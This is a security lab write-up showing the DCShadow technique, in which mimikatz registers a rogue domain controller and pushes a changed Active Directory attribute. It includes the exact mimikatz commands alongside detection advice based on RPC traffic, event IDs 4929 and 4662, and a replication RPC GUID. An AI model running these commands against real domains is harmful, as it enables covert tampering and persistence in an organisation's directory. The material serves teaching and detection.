Powered By GitBook
DCShadow - Becoming a Rogue Domain Controller
DCShadow allows an attacker with enough privileges to create a rogue Domain Controller and push changes to the DC Active Directory objects.

Execution

For this lab, two shells are required - one running with SYSTEM privileges and another one with privileges of a domain member that is in Domain admins group:
In this lab, I will be trying to update the AD object of a computer pc-w10$. A quick way to see some of its associated properties can be achieved with the following powershell:
1
PS c:\> ([adsisearcher]"(&(objectCategory=Computer)(name=pc-w10))").Findall().Properties
Copied!
Note the badpwcount property which we will try to change with DCShadow by setting the value to 9999:
[email protected]/SYSTEM console
1
mimikatz # lsadump::dcshadow /object:pc-w10$ /attribute:badpwdcount /value=9999
Copied!
We can now push the change to the primary Domain Controller DC-MANTVYDAS:
[email protected] Admin console
1
lsadump::dcshadow /push
Copied!
Below are the screenshots of the above commands and their outputs as well as the end result, indicating the badpwcountvalue getting changed to 9999:

Observations

As suggested by Vincent Le Toux who co-presented the DCShadow, in order to detect this type of rogue activity, you could monitor the network traffic and suspect any non-DC hosts (our case it is the PC-W10$ with 10.0.0.7) issuing RCP requests to DCs (our case DC-MANTVYDAS with 10.0.0.6) as seen below:
Same for the logs, if you see a non-DC host causing the DC to log a 4929 event (Detailed Directory Service Replication), you may want to investigate what else is happening on that system:
Current implementation of DCShadow in mimikatz creates a new DC and deletes its associated objects when the push is complete in a short time span and this pattern could potentially be used to trigger an alert, since creation of a new DC, related object modifications and their deletion all happening in 1-2 seconds time frame sound anomalous. Events 4662 may be helpful for identifying this:
Per Luc Delsalle's post on DCShadow explanation, one other suggestion for detecting rogue DCs is the idea that the computers that expose an RPC service with a GUID of E3514235–4B06–11D1-AB04–00C04FC2DCD2, but do not belong to a Domain Controllers Organizational Unit, should be investigated.
We see that our suspicious computer exposes that exact service:
..but does not belong to a Domain Controllers OU:
1
([adsisearcher]"(&(objectCategory=computer)(name=pc-w10))").Findall().Properties.distinguishedname
2
# or
3
(Get-ADComputer pc-w10).DistinguishedName
Copied!
Outputs for computer NOT belonging to DC OU and one belonging, respecitvely

References

Below are the resources related to DCShadow attack. Note that there is also a link to youtube by a security company Alsid, showing how to dynamically detect DCShadow, so please watch it.
Rogue Domain Controller, Technique T1207 - Enterprise | MITRE ATT&CK®
lsadump::dcshadow /push
mysmartlogon
https://www.youtube.com/watch?v=yWFUKwZaT_4
www.youtube.com
Dynamic Detection of DCShadow
GitHub - AlsidOfficial/UncoverDCShadow: A PowerShell utility to dynamically uncover a DCShadow attack
GitHub
DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more
DCShadow explained
Medium
Last modified 2yr ago